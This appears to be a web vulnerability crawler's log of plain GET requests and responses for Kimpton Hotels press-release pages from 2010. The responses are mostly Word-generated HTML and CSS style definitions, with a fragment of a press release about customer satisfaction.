<p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Stacey
Ellis / 415-955-5492 / </span><a href="mailto:stacey.ellis@kimptongroup.com"><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial;mso-bidi-font-style:italic'>stacey.ellis@kimptongroup.com</span></a><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p>

<p class=MsoNormal><span style='font-size:10.0pt;mso-bidi-font-size:11.0pt;
font-family:Arial;mso-bidi-font-family:Arial;mso-bidi-font-style:italic'>Jamie
Law / 415-955-5495 / </span><a href="mailto:jamie.law@kimptongroup.com"><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial;mso-bidi-font-style:italic'>jamie.law@kimptongroup.com</span></a><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial;mso-bidi-font-style:italic'><o:p></o:p></span></p>

<p class=MsoNormal align=center style='text-align:center'><span
style='font-size:10.0pt;mso-bidi-font-size:11.0pt;font-family:Arial;mso-bidi-font-family:
Arial;mso-bidi-font-style:italic'><o:p>&nbsp;</o:p></span></p>

<p class=MsoNormal align=center style='text-align:center'><b><span
style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'><o:p>&nbsp;</o:p></span></b></p>

<p class=MsoNormal align=center style='text-align:center'><b><span
style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>KIMPTON
GARNERS LEADING CUSTOMER SATISFACTION SCORE<o:p></o:p></span></b></p>

<p class=MsoNormal align=center style='text-align:center'><b><i><span
style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>Boutique
Hotel Company Keeps Guests Happy <o:p></o:p></span></i></b></p>

<p class=MsoNormal align=center style='text-align:center'><b><i><span
style='mso-bidi-font-size:12.0pt;font-family:Arial;mso-bidi-font-family:Arial'>According
to 2009 Market Metrix Hospitality Index<o:p></o:p></span></i></b></p>

<p class=MsoNormal style='line-height:150%'><span style='mso-bidi-font-size:
12.0pt;line-height:150%;font-family:Arial;mso-bidi-font-family:Arial;
mso-bidi-font-weight:bold'><o:p&g..
- /pdfs/press/html/Wines-That-Care-0210/index.html

/pdfs/press/html/Wines-That-Care-0210/index.html

http://www.kimptonhotels.com/pdfs/press/html/Wines-That-Care-0210/index.html

Request

GET /pdfs/press/html/Wines-That-Care-0210/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 38218
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=macintosh">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author> </o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>3</o:TotalTime>
<o:LastPrinted>2010-02-09T22:23:00Z</o:LastPrinted>
<o:Created>2010-02-09T22:24:00Z</o:Created>
<o:LastSaved>2010-02-09T22:24:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>1096</o:Words>
<o:Characters>6250</o:Characters>
<o:Lines>52</o:Lines>
<o:Paragraphs>12</o:Paragraphs>
<o:CharactersWithSpaces>7675</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Verdana;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:128;
mso-generic-font-family:swiss;
mso-font-pitch:variable;
mso-font-signature:-1 -23 1056964608 0 -16695552 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
h1
{mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-bidi-font-weight:bold;}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.25in right 6.5in;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:Arial;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Arial;
color:black;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.CharChar6
{mso-style-name:" Char Char6";
mso-ansi-font-size:24.0pt;
mso-bidi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-bidi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
font-weight:bold;}
span.CharChar5
{mso-style-name:" Char Char5";
mso-style-noshow:yes;
font-family:Arial;
mso-ascii-font-family:Arial;
mso-hansi-font-family:Arial;
mso-bidi-font-family:Arial;
color:black;}
span.CharChar4
{mso-style-name:" Char Char4";
mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;
font-family:Tahoma;
mso-ascii-font-family:Tahoma;
mso-hansi-font-family:Tahoma;
mso-bidi-font-family:Tahoma;}
span.CharChar3
{mso-style-name:" Char Char3";
mso-style-noshow:yes;
mso-ansi-font-size:10.5pt;
mso-bidi-font-size:10.5pt;
font-family:Consolas;
mso-ascii-font-family:Consolas;
mso-hansi-font-family:Consolas;}
span.CharChar2
{mso-style-name:" Char Char2";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.kim111
{mso-style-name:kim111;}
span.CharChar1
{mso-style-name:" Char Char1";
mso-style-noshow:yes;
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.CharChar
{mso-style-name:" Char Char";
mso-ansi-font-size:12.0pt;
mso-bidi-font-size:12.0pt;
font-family:Times;
mso-ascii-font-family:Times;
mso-hansi-font-family:Times;
mso-bidi-font-family:Times;}
span.dfs111
{mso-style-name:dfs111;
font-family:Verdana;
mso-ascii-font-family:Verdana;
mso-hansi-font-family:Verdana;}
/* Page Definitions */
@page
{mso-footnote-separator:url(":images:header.htm") fs;
mso-footnote-continuation-separator:url(":images:header.htm") fcs;
mso-endnote-separator:url(":images:header.htm") es;
mso-endnote-continuation-separator:url(":images:header.htm") ecs;}
@page Section1
{size:8.5in 11.0in;
margin:1.0in 1.0in 1.0in 1.0in;
mso-header-margin:.5in;
mso-footer-margin:.5in;
mso-paper-source:0;}
div.Section1
{page:Section1;}
/* List Definitions */
@list l0
{mso-list-id:-1802115189;
mso-list-type:hybrid;
mso-list-template-ids:201068776 -1 -1 -1 -1 -1 -1 -1 -1 -1;}
@list l0:level1
{mso-level-suffix:none;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level2
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level3
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level4
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level5
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level6
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level7
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level8
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l0:level9
{mso-level-start-at:0;
mso-level-text:"";
mso-level-tab-stop:none;
mso-level-number-position:left;
margin-left:0in;
text-indent:0in;}
@list l1
{mso-list-id:28848037;
mso-list-type:hybrid;
mso-list-template-ids:182875624 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l1:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l1:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l1:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l2
{mso-list-id:854463416;
mso-list-type:hybrid;
mso-list-template-ids:-2144938804 197641 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l2:level1
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:"Courier New";}
@list l3
{mso-list-id:1030841178;
mso-list-type:hybrid;
mso-list-template-ids:1856390760 -1888849478 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l3:level1
{mso-level-number-format:bullet;
mso-level-text:-;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Arial;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Arial;}
@list l3:level2
{mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level3
{mso-level-tab-stop:1.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level4
{mso-level-tab-stop:2.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level5
{mso-level-tab-stop:2.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level6
{mso-level-tab-stop:3.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level7
{mso-level-tab-stop:3.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level8
{mso-level-tab-stop:4.0in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l3:level9
{mso-level-tab-stop:4.5in;
mso-level-number-position:left;
text-indent:-.25in;}
@list l4
{mso-list-id:1566069662;
mso-list-type:hybrid;
mso-list-template-ids:291660558 1253897630 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l4:level1
{mso-level-number-format:bullet;
mso-level-text:\F0FC;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Wingdings;}
@list l5
{mso-list-id:1636525908;
mso-list-type:hybrid;
mso-list-template-ids:2135300666 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l5:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:none;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
@list l6
{mso-list-id:1707218260;
mso-list-type:hybrid;
mso-list-template-ids:1001260830 1676557052 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l6:level1
{mso-level-start-at:0;
mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;
mso-fareast-font-family:"Times New Roman";
mso-bidi-font-family:Arial;}
@list l6:level2
{mso-level-number-format:bullet;
mso-level-text:o;
mso-level-tab-stop:1.0in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:"Courier New";
mso-bidi-font-family:"Courier New";}
@list l7
{mso-list-id:1929657465;
mso-list-type:hybrid;
mso-list-template-ids:1347988556 66569 197641 328713 66569 197641 328713 66569 197641 328713;}
@list l7:level1
{mso-level-number-format:bullet;
mso-level-text:\F0B7;
mso-level-tab-stop:.5in;
mso-level-number-position:left;
text-indent:-.25in;
font-family:Symbol;}
ol
{margin-bottom:0in;}
ul
{margin-bottom:0in;}
.style1 {
font-family: Arial;
font-size: 11.0pt;
}
-->
</style>
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-hansi-..
- /pdfs/press/html/Green-Seal-0310/index.html

/pdfs/press/html/Green-Seal-0310/index.html

http://www.kimptonhotels.com/pdfs/press/html/Green-Seal-0310/index.html

Request

GET /pdfs/press/html/Green-Seal-0310/index.html HTTP/1.1
Referer: http://www.kimptonhotels.com/about-us/press-releases.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=hyd2ui55rxmm2q55xslvrq55; ASPSESSIONIDAQQBQDDR=JDFEFPHBNDJFCIHIDDMHMENO
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 02:10:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 36382
Content-Type: text/html
Cache-control: private


<html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:dt="uuid:C2F41010-65B3-11d1-A29F-00AA00C14882"
xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
xmlns:css="http://macVmlSchemaUri" xmlns="http://www.w3.org/TR/REC-html40">

<head>
<meta name=Title content=" ">
<meta name=Keywords content="">
<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 2008">
<meta name=Originator content="Microsoft Word 2008">
<link rel=File-List href="images/filelist.xml">
<link rel=Edit-Time-Data href="images/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
o\:* {behavior:url(#default#VML);}
w\:* {behavior:url(#default#VML);}
.shape {behavior:url(#default#VML);}
</style>
<![endif]-->
<title> </title>
<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Author>Marliese Engel</o:Author>
<o:Template>Normal.dotm</o:Template>
<o:LastAuthor>Marie Chen</o:LastAuthor>
<o:Revision>2</o:Revision>
<o:TotalTime>2</o:TotalTime>
<o:LastPrinted>2010-04-28T18:21:00Z</o:LastPrinted>
<o:Created>2010-04-28T18:21:00Z</o:Created>
<o:LastSaved>2010-04-28T18:21:00Z</o:LastSaved>
<o:Pages>1</o:Pages>
<o:Words>1283</o:Words>
<o:Characters>7314</o:Characters>
<o:Company>Baltz &amp; Company</o:Company>
<o:Lines>60</o:Lines>
<o:Paragraphs>14</o:Paragraphs>
<o:CharactersWithSpaces>8982</o:CharactersWithSpaces>
<o:Version>12.0</o:Version>
</o:DocumentProperties>
<o:CustomDocumentProperties>
<o:_NewReviewCycle dt:dt="string"></o:_NewReviewCycle>
</o:CustomDocumentProperties>
<o:OfficeDocumentSettings>
<o:PixelsPerInch>96</o:PixelsPerInch>
<o:TargetScreenSize>800x600</o:TargetScreenSize>
</o:OfficeDocumentSettings>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:WordDocument>
<w:TrackMoves>false</w:TrackMoves>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:UseNormalStyleForList/>
<w:DontUseIndentAsNumberingTabStop/>
<w:DontGrowAutofit/>
<w:FELineBreak11/>
<w:WW11IndentRules/>
<w:DontAutofitConstrainedTables/>
<w:AutofitLikeWW11/>
<w:HangulWidthLikeWW11/>
</w:Compatibility>
</w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" LatentStyleCount="276">
</w:LatentStyles>
</xml><![endif]-->
<style>
<!--
/* Font Definitions */
@font-face
{font-family:Arial;
panose-1:2 11 6 4 2 2 2 2 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Courier New";
panose-1:2 7 3 9 2 2 5 2 4 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Times;
panose-1:2 0 5 0 0 0 0 0 0 0;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Wingdings;
panose-1:5 2 1 2 1 8 4 8 7 8;
mso-font-charset:2;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:0 0 65536 0 128 0;}
@font-face
{font-family:Calibri;
panose-1:2 15 5 2 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:Tahoma;
panose-1:2 11 6 4 3 5 4 4 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
@font-face
{font-family:"Arial Unicode MS";
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:50331648 0 0 0 16777216 0;}
@font-face
{font-family:Consolas;
panose-1:2 11 6 9 2 2 4 3 2 4;
mso-font-charset:0;
mso-generic-font-family:auto;
mso-font-pitch:variable;
mso-font-signature:3 0 0 0 16777216 0;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{mso-style-parent:"";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
h1
{mso-style-link:"Heading 1 Char";
mso-margin-top-alt:auto;
margin-right:0in;
mso-margin-bottom-alt:auto;
margin-left:0in;
mso-pagination:widow-orphan;
mso-outline-level:1;
font-size:24.0pt;
mso-bidi-font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";}
p.MsoCommentText, li.MsoCommentText, div.MsoCommentText
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
p.MsoHeader, li.MsoHeader, div.MsoHeader
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
p.MsoFooter, li.MsoFooter, div.MsoFooter
{margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
tab-stops:center 3.0in right 6.0in;
font-size:11.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";}
span.MsoCommentReference
{mso-style-noshow:yes;
mso-ansi-font-size:8.0pt;
mso-bidi-font-size:8.0pt;}
p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
{margin-top:0in;
margin-right:0in;
margin-bottom:6.0pt;
margin-left:0in;
line-height:200%;
mso-pagination:widow-orphan;
font-size:12.0pt;
font-family:Times;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Times;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;
text-underline:single;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;
text-underline:single;}
strong
{mso-bidi-font-weight:bold;}
p.MsoDocumentMap, li.MsoDocumentMap, div.MsoDocumentMap
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
background:navy;
font-size:10.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
p.MsoPlainText, li.MsoPlainText, div.MsoPlainText
{mso-style-noshow:yes;
mso-style-link:"Plain Text Char";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.5pt;
font-family:"Times New Roman";
mso-ascii-font-family:Consolas;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Consolas;
mso-bidi-font-family:"Times New Roman";}
p.MsoCommentSubject, li.MsoCommentSubject, div.MsoCommentSubject
{mso-style-noshow:yes;
mso-style-parent:"Comment Text";
mso-style-next:"Comment Text";
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman";
mso-ascii-font-family:Calibri;
mso-fareast-font-family:Calibri;
mso-hansi-font-family:Calibri;
mso-bidi-font-family:"Times New Roman";
font-weight:bold;}
p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
{mso-style-noshow:yes;
margin:0in;
margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:8.0pt;
font-family:Tahoma;
mso-fareast-font-family:Calibri;
mso-bidi-font-family:Tahoma;}
span.Heading1Char
{mso-style-name:"Heading 1 Char";
mso-style-locked:yes;
mso-style-link:"Heading 1";
mso-ansi-font-size:24.0pt;
font-family:"Arial Unicode MS";
mso-ascii-font-family:"Arial Unicode MS";
mso-fareast-font-family:"Arial Unicode MS";
mso-hansi-font-family:"Arial Unicode MS";
mso-font-kerning:18.0pt;
mso-ansi-language:EN-US;
mso-fareast-language:EN-US;
font-weight:bold;
mso-bidi-font-weight:normal;}
span.PlainTextChar
{mso-style-name:"Plain Text Char";
mso-style-noshow:yes;
mso-style-locked:yes;
mso-style-link:"Plain Text";
